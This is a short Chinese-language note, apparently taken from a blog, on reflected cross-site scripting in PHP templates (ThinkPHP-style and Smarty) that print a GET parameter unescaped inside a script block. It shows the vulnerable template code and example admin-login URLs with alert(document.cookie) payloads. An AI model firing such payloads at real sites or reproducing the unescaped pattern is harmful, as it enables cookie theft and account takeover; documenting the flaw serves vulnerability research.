来自http://wp.iyouths.org/256.html
主要在get请求中
<script>
(function(){
var a = {:$_GET['b']};
//....
})()
</script>
admin.php/Login/index/?b=%27%27;alert(document.cookie);//
后台比如攻击方式http://shop/index.php/admin/Manager/login/?b="1";alert(document.cookie);// 能够成功
用smarty模板的如下
<script>
(function(){
var a = {$smarty.get['b']}
})()
</script>